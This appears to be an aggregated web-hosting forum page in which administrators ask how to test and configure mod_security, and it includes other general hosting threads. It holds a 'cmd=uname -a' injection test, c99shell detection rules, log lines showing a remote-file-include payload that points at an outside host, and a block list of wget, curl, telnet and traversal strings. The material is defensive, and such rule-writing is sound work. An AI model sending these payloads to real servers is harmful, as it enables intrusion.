Common Attack To Test Mod_security

Jul 22, 2008

I just installed mod_security and would like to test some common attack to see if it's blocking it

I tried passing "cmd=uname -a" as parameter to a .php, but it didn't block it
any other test I can try?

I'm using almost all rules from gotroot

View 8 Replies


ADVERTISEMENT

C99Shell :: Attack Rules For Mod_security

Oct 3, 2007

i want to prevent c99shell scripts from running.

I found this rule to detect URI's for the c99 shell.

#new kit
SecFilterSelective REQUEST_URI "/c99shell.txt"
SecFilterSelective REQUEST_URI "/c99.txt?"
My problem is that the hackers are being more stealthy and calling the
script some random name like .../myphpstuff.php. So the URI no longer helps detect it.

How could I detect "c99shell" in the actual file that apache servers? This assumes that the hacker was successfully in installing it.

my box

Apache 1.3.37
WHM 11.2.0 cPanel 11.11.0-R16983
FEDORA 5 i686 - WHM X v3.1.0

View 3 Replies View Related

Anybody Know How To Block This Specific PHP Inject Attack Using Mod_Security

Jun 17, 2008

how to block the following "WEB-PHP remote include path" attack using mod_security.

I have tried using Default Mod_Securty and also Mod_security from [url]

But it seems that the mod_security did not functioning well in which PHP inject script still able to run on my server.

The following is the WEB-PHP remote include path that i mentioned about taken from the Apache Access log.

=================================

127.0.0.1 - - [15/Jun/2008:15:09:02 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473
127.0.0.1 - - [15/Jun/2008:15:18:30 +0800] "GET /?path_escape=http://www.m-comp.nl/prive/includes/js/ThemeOffice/fonts.txt%3f%3f HTTP/1.1" 200 3473 ....

View 1 Replies View Related

Why Is CentOS Most Common

May 20, 2009

Why do most VPS servers have CentOS as the default/most common OS for linux?

View 14 Replies View Related

What Are The Common Scams

Jan 24, 2008

What are the common scams or abuse, that beginning resellers need to be weary of? and how do you reduce exposure to these problems?

View 2 Replies View Related

Common Managed Colocation

Nov 2, 2009

I am writing an article about managed colocation (what it is, what are the benefits, how is it different from other hosting options, etc.).

What are some common questions you get from your customers regarding your managed colocation or managed services?

Do they see the value right away? Why are the hesitant? Is it clear to them which aspect of their server is under the control of the hosting company and which is still their responsibility?

View 12 Replies View Related

How Common Is Port 8080

Aug 6, 2007

I want to have a static server for my website which runs on the same machine as the dynamic server. I have read on the internet that port 8080 is a good alternative port to use.

Is common enough that it will work in all cases like port 80? And that it won't be blocked by firewalls and so on since it's not a service port (port < 1024).

View 5 Replies View Related

Is It Common For Hosts To Provide Only 1 Db

Jul 9, 2007

Is it common for 10-15$+/month to provide only 1 database?

View 12 Replies View Related

Most Common Hosting Platform

Jun 2, 2007

The most common hosting platform is linux correct?

View 9 Replies View Related

Common ./configure Parameters For Apache And PHP

Oct 28, 2007

What are the ./configure parameters commonly used for Apache (2.2) and PHP (5.2) installations on web hosting servers?

View 5 Replies View Related

Yum Error: Gclib-common Dependency

Sep 9, 2007

After install yum on my centOS 4.4 VPS, I ran yum update and got this error:

Error: Missing Dependency: glibc-common = 2.3.4-2.25 is needed by package glibc-dummy-centos-4

When I tried to install glibc-common, I got this error:

error: Failed dependencies:
glibc-common = 2.3.4-2.25 is needed by (installed) glibc-2.3.4-2.25.i686
glibc-common = 2.3.4-2.25 is needed by (installed) glibc-dummy-centos-4-2.3.4-2.25.swsoft.i386

When trying to install these other things, I get more dependency errors. I noticed that glibc-dummy-centos-4-2.3.4-2.25.swsoft.i386 was mentioned. I'm not sure what this is, but it's by SwSoft? Is this something I have to contact my provider about? Thanks.

View 12 Replies View Related

What Are Common MySQL User Permissions

Jun 29, 2007

I want to use something like PHPBB forums and using one MySQL user and database. Just wondering, what are common user permissions I should set for the user? I want to try to minimize any permissions that can cause big risk to the server security.

Here is a full list of permissions I can grant to the user (via Webmin):

-Select table data
-Insert table data
-Update table data
-Delete table data
-Create tables
-Drop tables
-Grant privileges
-Reference operations
-Manage indexes
-Alter tables
-Create temp tables
-Lock tables

View 3 Replies View Related

Is Data Theft Common In Dedicated Industry

Apr 10, 2008

Is data theft common in dedicated industry? such as source code theft, especially in fully managed hosting situation?

View 14 Replies View Related

MySQL's Error Code 28: What Are It's Common Causes And Other Pertinent

Nov 22, 2008

This is part 1 of a personal tragic-comic narrative starring myself, a simple, unassuming end-user of value-based web hosting services, and the supreme villain of this pathetic tale, the Iago to my Othello, would be a verminous, sub-human parasite collective disguised as a professional web-hosting company in the vicinity of Columbus, Ohio.

Speaking of Shakespeare, it seems to this humble WHT supplicant that the comedy of errors authored by the entities in question, a craven crew of possum-bellied, pigeon-brained menagerie of cubicle-dwelling subhuman troglodytes masquerading as ethical business-persons and capable hosting providers, is so egregious that if a scale of measurement is ever devised for web-hosting incompetence, it should be named after this company, in recognition of their utter incompetence and arbitrary imbecilic buffoonery disguised as reasonable technical support and customer service.

Apparently this company thinks it's more important to use their scale-encrusted rat-tails to cover up their own mistakes instead of giving reasonable responses to customer questions regarding apparent server issues.

Which brings me to my initial question:

MySQL's docs say that Error Code 28 results from lack of disk space or write permissions.

What are the common causes of this? Who has the power to control it from happening, the web host or the end user?( in this arrangement, the host is running an overloaded server and controls all of the configurations and aspects of the server while the user is using secure software with moderate usage of bandwidth and database queries).

I have additional questions in regards to a more general issue regarding failure to write/open to directories as well, but I'll wait for some responses first.

Excellent forum, by the way.

View 7 Replies View Related

Apache :: Basic Auth User Not Logged In Common Log File

Jul 18, 2013

I use Basic Auth to limit access to a web site. This seems to work ok. I noticed though in the logs that the logged in user is not logged:

80.....188 - - [16/Jul/2013:09:56:29 +0200] "GET ..." 200 1844 "...." " ...

I would expect the second - to be replaced by the logged in user. The doc says, the user is logged if the document is protected. I do protect the whole directory using directory match. Without log in I fail to retrieve the document in question.

View 4 Replies View Related

Mod_Security 2.5, Or 2.0?

Apr 21, 2008

I have been using mod_security 1.9.x since it first release on apache 1.3 and apache 2.0.x, rules are great and they work perfect with no issues at all with any php-mysql website. Do you recommend using mod_security 2.0 or 2.5 ? (I do know that 2.5 does not work with apache 1.3).

View 2 Replies View Related

Mod_security Won't Log Anything

Apr 19, 2008

using mod_security, but I believe that I have it installed correctly with some rules that should be generating entries in the security audit log. No matter what I do, I can't seem to get mod_security to generate any sort of log entries.

I am using version 2.1.7. I compiled it with no problems. In my httpd.conf file, I have the following relevant lines:

LoadFile /usr/lib/libxml2.so
LoadModule security2_module modules/mod_security2.so
Include conf/modsecurity/*.conf

I don't think there are any problems here, as I know it is running directives from the configuration file I edited. This is the file I'm working with:

modsecurity_crs_10_config.conf

Here are the relevant lines from the config file:

SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess On
SecResponseBodyMimeType (null) text/html text/plain text/xml
SecResponseBodyLimit 524288
SecDefaultAction "phase:2,auditlog,log,pass,status:500"
SecAuditEngine On
SecAuditLogType Serial
SecAuditLog logs/modsec_audit.log
SecAuditLogParts "ABIFHZ"
SecRequestBodyInMemoryLimit 131072
SecDebugLog logs/modsec_debug.log
SecDebugLogLevel 3

I know that the config file is being read because when I start apache, the log files (modsec_audit.log and modsec_debug.log) are created. The problem is that the files are empty and remain empty no matter what I do. I have even tried setting permissions on the files to 777.

Here are a couple of rules I created in an attempt to generate log entries:

SecRule REQUEST_BODY "viagra"
SecRule REMOTE_ADDR "^1.1.3.4$" auditlog,phase:1,allow

I put these in the same config file mentioned above. As far as I understand, the first rule should examine the request body (which would include data in POST requests) for the word, "viagra". Since my default action is phase:2,auditlog,log,pass,status:500, such requests should end up in the audit log. However, when I use a form on my site to post the word "viagra", nothing is generated in the log file.

The second rule, as far as I understand, should generate a log entry any time the IP address 1.2.3.4 is sent in the request headers. Instead of 1.2.3.4, of course, I have put in my real IP address. However, when I visit my server and browse pages, nothing is logged. I assume that my requests should generate log entries since I match the IP address.

View 3 Replies View Related

Mod_security

Dec 1, 2007

I am currently running a few small websites that use a CMS. Two are Dragonfly and one is Joomla.

I am getting sporadic errors with both systems that, upon research, seem to be related to Apache and the mod_security module. I am getting the following error:

Code:
Not Acceptable

An appropriate representation of the requested resource /somefolder/index.php could not be found on this server.

Well, I'm no idiot (although some people may tend to disagree ) and after some searching, I found that this most likely points to an Apache error. Most solutions suggest to put the following in my .htacess file for the site:

Code:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

It was noted that "SecFilterScanPOST Off" may or not be necessary. I have added the above to the .htaccess for each site (all 3 sites are subdomains) and have also added it to the .htaccess that is in the root folder for the site. Nothing has worked.

So my question is, is it possible that my webhost can override my .htaacess settings with their own? This is the only explanation that I can think of. But of course, I am no expert, which is why I turn to you good folks for help once again.

View 0 Replies View Related

Mod_security

Jul 27, 2008

I want to add some more rules to to mod_security, however I am unsure if some of them are already being used.

So would it cause any problems if there are duplicate rules for the time being till I can check through all the rules?

View 2 Replies View Related

Mod_security On RH 5 64

Jul 23, 2007

I am having lots of problems installing mod_security on RH5 64 w/ Plesk.

mainly related to apr0, subversion, and the headers.

Any reason why everyone recommends to use version 1.94 of mod_security rather than the latest version available on www.modsecurity.org?

View 3 Replies View Related

Mod_security

Oct 2, 2007

I've got this:

mod_security: Access denied with code 406. Error normalising REQUEST_URI: Invalid URL encoding detected: invalid characters used [hostname "www.mydomain.com"] [uri "/search/include/js_suggest/suggest.php?type=query&q=%u062E%u0636%u0631%u0627"]

how to disable/exclude this uri in mentioned host from being catched by mod_security?

View 4 Replies View Related

Mod_security 1 Or 2 - What Do You Use?

Mar 29, 2007

how many people are actually using mod_security 2 instead of 1?

And why did you choose the version you did?

View 4 Replies View Related

Mod_security & C99shell Anyone Help Please ?

Jun 5, 2007

I installed modsecurity from Addone module in Cpanel

When I try to apply phpshell woork good without a mistakes and I can do anything despite of the presence of protection modsecurity and disable_functions in php.ini.

Is there a particular settings add to the httpd.conf to prevent application phpshell or prevent upload it to the site?

View 14 Replies View Related

Mod_security And Mod_filter

May 11, 2009

I tried using mod_security and mod_filter together. However, when I try to filter js files, I noticed that certain pages stop working, especially those using ajax.

View 2 Replies View Related

Mod_Security Configuration

Jul 24, 2009

I installed Mod_Security on my Cent OS server today and having some problem in configurating it.

Problem -

I have added this module in 'httpd.conf' file

Code:
<IfModule mod_security.c>
SecFilterEngine On

SecServerSignature "Apache"
SecFilterCheckUnicodeEncoding Off
SecAuditEngine RelevantOnly
SecAuditLog logs/audit_log
SecFilterScanPOST On

SecFilterDefaultAction "deny,log,status:403"

SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

SecFilterSelective HTTP_Transfer-Encoding "!^$"

SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"

SecFilter "viewtopic.php?" chain
SecFilter "chr(([0-9]{1,3}))" "deny,log"

SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
SecFilterSelective THE_REQUEST "/config.php?v=1&DIR "
SecFilterSelective THE_REQUEST "/../../ "
SecFilterSelective THE_REQUEST "&highlight=%2527%252E "
SecFilterSelective THE_REQUEST "changedir=%2Ftmp%2F.php "

# Very crude filters to prevent SQL injection attacks
SecFilter "delete[[:space:]]+from"
SecFilter "insert[[:space:]]+into"
SecFilter "select.+from"

# Weaker XSS protection but allows common HTML tags
SecFilter "<[[:space:]]*script"

# Prevent XSS atacks (HTML/Javascript injection)
SecFilter "<(.|n)+>"
</IfModule>

But my website is multi forum hosting and requires 'index.php' file to pass parameter to make it work.

Example -

[url]
[url]
[url]

So i had to delete below mention code from above module.

Code:
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

SecFilterSelective HTTP_Transfer-Encoding "!^$"

SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"
SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"
SecFilter "../"

View 0 Replies View Related

Mod_security Rules

May 25, 2009

Is it possible to disable a particular mod_security rule for particular directory or the rules are global?

View 4 Replies View Related

Mod_security Rules In WHM

Aug 15, 2008

I just installed mod_security via WHM, and want to know what rule should I enter to prevent some URLs from being opened.

For example, if URL contains word "abc" (like domain.com/some_folder/abc/file.php), it should not be opened.

View 4 Replies View Related

Mod_security And ISPConfig3

May 20, 2009

I have installed a new server with debian lenny 5, ISPConfig 3.0.1.1 and the newest mod_security and implemented the default rules.

I deactivated the rule detecting IP in pageheaders.

Then I got another problem. Some actions of ISPConfig are detected as "remote file access attempt", severity "critical", tag "web attack/file injection" data "/etc/"

detected by rule file crs_40 line 114, id 950005

question: how do I authorize ISPConfig and only ISPConfig to perform such requests on the server?

View 4 Replies View Related

How To Set The Rules Of MOD_Security

Jun 4, 2008

how to set the rules of MOD_Security.

Another question for professionals:

Q: What are the best rules to secure my server? I'd appreciate if you managed to attach these rules to your replies. // FYI, I host VBulletin portals.

View 3 Replies View Related

Mod_Security - Using RBLs

Dec 24, 2008

Trying to use an RBL with ModSecurity but this matches everything whether listed or not.
SecRule REMOTE_ADDR "@rbl bb.barracudacentral.org" "log,deny,msg:'POST RBL Comment Spammer'"

What I would like to do is do an RBL lookup and any POST operations.

View 2 Replies View Related

Mod_security 2 Rules

Feb 25, 2008

make this rules work on apache 2 mod_security 2?

View 4 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved